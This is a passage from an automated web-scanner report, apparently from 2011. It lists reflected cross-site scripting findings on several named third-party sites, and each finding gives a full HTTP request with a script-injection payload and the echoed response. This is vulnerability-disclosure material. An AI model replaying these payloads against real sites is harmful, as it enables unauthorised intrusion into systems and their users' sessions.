P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=f15f4987-c68a-413c-8a95-f80937257345; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305468370; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_71956589444c6f80<script>alert(1)</script>ee62fdbac8({"r":null});

3.4. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-interface.iinet.net.au
Path:   /async/content/browse/westnet/fetchtv

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c28e6<script>alert(1)</script>0baf0e78e5e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /async/content/browse/westnet/fetchtv?format=json&jsoncallback=jsonp1305465648404c28e6<script>alert(1)</script>0baf0e78e5e HTTP/1.1
Host: content-interface.iinet.net.au
Proxy-Connection: keep-alive
Referer: http://www.westnet.com.au/fetchtv/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1305465653346; s_pv15=general; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:22:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=inaroatal6lptet548pajte327; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-Alive
Content-Length: 1152

jsonp1305465648404c28e6<script>alert(1)</script>0baf0e78e5e({"cat_id":"761","cat_parent_id":"760","cat_type_id":"3","cat_title":"Fetchtv","cat_description":"","cat_featured":"0","cat_restricted":"0","cat_published":"1","cat_published_startdate":"2011-04-17 06:
...[SNIP]...

3.5. http://content-interface.iinet.net.au/async/content/play/video/high/5619 [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-interface.iinet.net.au
Path:   /async/content/play/video/high/5619

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload d0ec8<script>alert(1)</script>0c3f4987c6a was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /async/content/play/video/high/5619?format=json&jsoncallback=jsonp1305465648405d0ec8<script>alert(1)</script>0c3f4987c6a HTTP/1.1
Host: content-interface.iinet.net.au
Proxy-Connection: keep-alive
Referer: http://www.westnet.com.au/fetchtv/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1305465653346; s_pv15=general; s_sq=%5B%5BB%5D%5D; PHPSESSID=nqeto2vvcs77r9ol4m0h4ab533

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:22:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-Alive
Content-Length: 1252

jsonp1305465648405d0ec8<script>alert(1)</script>0c3f4987c6a({"vid_id":"5619","vid_title":"fetchtv Promotional Video","vid_description":"","vid_type":"vod","vid_featured":"0","vid_available":"1","vid_restricted":"0","vid_published":"1","vid_published_startdate"
...[SNIP]...

3.6. http://ds.addthis.com/red/psi/sites/www.eshopfitters.co.uk/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.eshopfitters.co.uk/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 47c0e<script>alert(1)</script>05723e98a27 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.eshopfitters.co.uk/p.json?callback=_ate.ad.hpr47c0e<script>alert(1)</script>05723e98a27&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.eshopfitters.co.uk%2Frecent_projects.php%3FcPath%3D0&ref=http%3A%2F%2Fwww.eshopfitters.co.uk%2Frecent_projects.php%3FcPath%3D0%26eshopid%3D10pvambtnu2kngg2e8j7hksqo4&nayq8g HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305398109.1FE|1305398109.1OD|1305398109.60|1305398109.1EY; psc=4; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 15 May 2011 14:04:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 14 Jun 2011 14:04:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 15 May 2011 14:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 15 May 2011 14:04:46 GMT
Connection: close

_ate.ad.hpr47c0e<script>alert(1)</script>05723e98a27({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.7. http://image.providesupport.com/cmd/chatcisp1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/chatcisp1

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a41fb<script>alert(1)</script>adc6871f1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmda41fb<script>alert(1)</script>adc6871f1d1/chatcisp1?ps_t=1305465394080&ps_l=http%3A//www.cisp.com/&ps_r=&ps_s=sqa5xksTHqX5 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:17:00 GMT
Content-Length: 530

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmda41fb<script>alert(1)</script>adc6871f1d1/chatcisp1?ps_t=1305465394080&ps_l=http://www.cisp.com/&ps_r=&ps_s=sqa5xksTHqX5
</pre>
<!-- =
...[SNIP]...

3.8. http://image.providesupport.com/cmd/corecommerce [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/corecommerce

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cfc0e<script>alert(1)</script>4318a75fb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmdcfc0e<script>alert(1)</script>4318a75fb08/corecommerce?ps_t=1305467817745&ps_l=http%3A//www.corecommerce.com/%3Fgclid%3DCOfz98aO6qgCFQly5Qod3VaGJw&ps_r=&ps_s=sqa5xksTHqX5&amp%3Bps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:32 GMT
Content-Length: 533

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmdcfc0e<script>alert(1)</script>4318a75fb08/corecommerce?ps_t=1305467817745&ps_l=http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw&ps_r=&ps_s=sqa5xksTHqX5&amp;ps_t=1305467816428
</pre>
...[SNIP]...

3.9. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ade5c<script>alert(1)</script>67b2701a442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:39 GMT
Content-Length: 569

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf&ps_t=1305465392691
</pre>
<!-- ==========================
...[SNIP]...

3.10. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 407ec<a>caf30e524a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:41 GMT
Content-Length: 551

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691
</pre>
<!-- ============================================
...[SNIP]...

3.11. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47b9a<script>alert(1)</script>c2f4fa10813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js47b9a<script>alert(1)</script>c2f4fa10813/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:25 GMT
Content-Length: 577

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js47b9a<script>alert(1)</script>c2f4fa10813/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428
</pre>
<!-- ==================
...[SNIP]...

3.12. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 393de<a>8964a54983f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/corecommerce393de<a>8964a54983f/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:30 GMT
Content-Length: 555

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/corecommerce393de<a>8964a54983f/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428
</pre>
<!-- ========================================
...[SNIP]...

3.13. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 335fa<script>alert(1)</script>14eac9dc13f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/j2global/mbox/standard?mboxHost=www.new.onebox.com&mboxSession=1305465387100-728648&mboxPage=1305465831614-198194&screenHeight=1200&screenWidth=1920&browserWidth=1020&browserHeight=945&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f&mboxId=0&mboxTime=1305447831706&mboxURL=http%3A%2F%2Fwww.new.onebox.com%2Fpricing-receptionist&mboxReferrer=http%3A%2F%2Fwww.new.onebox.com%2Fhome&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/pricing-receptionist
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 211
Date: Sun, 15 May 2011 13:25:44 GMT
Server: Test & Target

mboxFactories.get('default').get('OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305465387100-728648.17");

3.14. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c9469<script>alert(1)</script>497805b5141 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H05525c9469<script>alert(1)</script>497805b5141&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.vehix.com/?VXSS=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; udm_0=MLvv7iEOIS5n5S4sf9LIKM6Bpt3BQhwXLKhpumJAKH9ZohLvamWO+huyCocJXJDsRczd6FCC/ukv6Xpz1uzdB8jd3W3ILSjdYtnKq3F9jFyZqD377+Us3Nbw7cs1UpXwdejqHoMXde16Mzxvxei7KC+8NBsY8GM6zdRigHER7kUDTsulJ9IyAYcLvyqoyZkQZN5z/aEPrq5n9N0flh2HtuQC41Gxciq7dBDbJX43Xt+nPxvpxIe8OCCnhK5r9ANhaH8LDHQ5aMdNSJp7kYijGTihLVaWzIq5ufydYbNm9P66qBzXsYWmpLYHASVODs5MLGnqaWomJ4kcVVYuRCgplE/8t8hfOuSjORkUuX1twlOccQpK/83a1p6p9gD0Mn657YX8gBmi8+iaxuJ1uHrwDpYm9/xzIaPpzjNK3NRsH9kymE77A07UhIw2q6tBPVlAmPAo+E/4sNqVsTXMtLJrRfea6YQd80ALRcIt+FQ4/eHT1DPQo8qEvpq5YbGrPh1tfrFz62318KfxrC9Xe3bodpJLTOpoy6FPVvvvE/jbr2s6ubXR175Ye9eHk5CyuBojjk2prQ==; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_t9z0="MLs3rF9vsF9nIDEz8lYBG8y1T5yYjdlQKkw4AX/Jd8BMMq7CQ2GtihxyUr10/ojPYcDD+dkjQwqWyPMNJwLxMlQOzBzvptrVk8y3CBYM8B8qXhaXuoc1PqcPHJPJdLwfhziejg4aYNfvU0EE1iSJty6dRJIxPFptrkL3lAGdy/zUX1OQLueuy+BXbF7ZvWdtV4ac1sKxH2JbE/Y="; rsi_us_1000000="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"; rtc_B6lA=MLuBU4kHAVhDF1LCdcKXDzQFlw1IZ8BYwogNsnhBUGsfVkhkAPoI68+Xd8YLhw8U09tff4uBLKooVnFpj3ggkQ==; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby6k1VtDsXg7sk5WAKTYPpgxBsJGyT/YmPwZWTFxu/fSGzXIpsZZc8j0XeTXtRfm8Gw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 15 May 2011 13:19:09 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 16 May 2011 13:19:09 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 15 May 2011 13:19:09 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H05525C9469<SCRIPT>ALERT(1)</SCRIPT>497805B5141" was not recognized.
*/

3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mods4rides.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb6e"><script>alert(1)</script>40d92ee4d7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bb6e\"><script>alert(1)</script>40d92ee4d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bb6e"><script>alert(1)</script>40d92ee4d7c=1 HTTP/1.1
Host: mods4rides.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43691
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:35 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.7(2008-08-11) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:35 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 38839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<meta h
...[SNIP]...
<a href="index.php?7bb6e\"><script>alert(1)</script>40d92ee4d7c=1&Make=all&Model=all&Year=0">
...[SNIP]...

3.16. http://onebox.extole.com/offers/23073174/share [extra_url_query_string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onebox.extole.com
Path:   /offers/23073174/share

Issue detail

The value of the extra_url_query_string request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af9f"><script>alert(1)</script>72a5800a358 was submitted in the extra_url_query_string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/23073174/share?extra_url_query_string=706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358 HTTP/1.1
Host: onebox.extole.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _dominus_pid%3A23073174=BAgiDjgyNDE0MTM5OQ%3D%3D--8e2b080a34253b88d9d0fc37d226375f2d43d303; _dominus_token=1a1831e3bdc5a45c926fca7607d04f8af00dd39c

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 13:24:29 GMT
ETag: "e7621760ce681ce5d446c7add907b2c1"
Server: nginx/0.7.65
Set-Cookie: _dominus_consumer=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _dominus_session=BAh7BzoQX2NzcmZfdG9rZW4iMUFlNzRRZDlkd3dqUHpqYjFWU0hETFovdWNUTGNPZE9DdENHOTZiL0dnNUk9Og9zZXNzaW9uX2lkIiU3ODZhNDIzMzkxMmQ5YzBjODY5ZDIyM2M1MjUxZWU2Yg%3D%3D--867ac15d0b9d131d77d8ef999a06598bf8cbde55; path=/; HttpOnly
Status: 200 OK
X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5
X-Runtime: 55
Connection: keep-alive
Content-Length: 26380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="extra_url_query_string" value="706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358" />
...[SNIP]...

3.17. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3 was submitted in the name parameter. This input was echoed as 198d5<x style=x:expression(alert(1))>5b0a294aec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3&sid=1888 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: uid=1_1305465399_1305465399580:3638810180517586; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: kwd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: sit=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: cre=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: bpd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: apd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: scg=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: ppd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: afl=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 15 May 2011 13:16:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing198d5<x style=x:expression(alert(1))>5b0a294aec3' *not* found -->

3.18. https://shop.widevoip.com/authentication.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dab5'-alert(1)-'2e2335fcaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

